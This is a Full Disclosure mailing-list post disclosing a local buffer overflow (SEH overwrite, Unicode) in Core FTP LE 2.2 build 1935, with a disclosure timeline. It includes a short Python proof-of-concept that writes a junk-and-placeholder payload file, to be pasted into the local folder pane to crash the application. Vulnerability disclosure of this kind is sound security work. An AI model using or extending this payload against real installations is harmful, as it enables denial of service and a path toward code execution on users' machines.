Date: Sun, 8 Sep 2019 11:44:27 +0600
From: Debashis Pal <debashis.pals@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Core FTP LE Version 2.2, build 1935 - Local Buffer Overflow (SEH Unicode)

#!/usr/bin/python

# Exploit Title: Core FTP LE Version 2.2, build 1935 - Local Buffer Overflow (SEH Unicode)
# Vulnerability Details: Core FTP LE Version 2.2, build 1935 is prone to a buffer overflow vulnerability that may result in a DoS user local folder selection pane
# Exploit Type: DOS
# Date: 08-Sep-2019
# Vulnerable Software: Core FTP LE
# Version: Version 2.2, build 1935
# Vendor Homepage: http://www.coreftp.com/
# Software Link: http://www.coreftp.com/download/coreftplite.exe
# Tested Windows: Windows Vista Ultimate SP2 (32-bit), Windows 7 Professional SP1 (32-bit)
# Exploit Author: Debashis Pal

# Timeline
# Vulnerability Discover Date: 01-Sep-2019
# Vulnerability Report to Vendor: 01-Sep-2019, no response
# Again email to Vendor: 05-Sep-2019, no response
# Public Disclose: 08-Sep-2019

# PoC
# 1. coreftpleversion2-2build1935.txt from POC.py code, open in notepad (coreftpleversion2-2build1935.txt), copy contents
# 2. Open Core FTP LE (Version 2.2, build 1935)
# 3. Select the left interface (CORE FTP LE, local folder selection pane)
# 4. Paste contents from notepad
# 5. Application will crash and SEH overwritten with Unicode



crash =  "\x43"  * 585 #Junk
crash += "\x42"  * 2   #nSEH
crash += "\x41" *  2   #SEH
crash += "\x44"  * 411 #More Junk


file = "coreftpleversion2-2build1935.txt"
generate = open(file, "w")
generate.write(crash)
generate.close()  # close() must be called; the bare attribute reference did nothing

#Attachment: Application will crash and SEH overwritten with Unicode.jpg

Thank you,
Debashis Pal

Download attachment "Application will crash and SEH overwritten with Unicode.jpg" of type "image/jpeg" (346429 bytes)

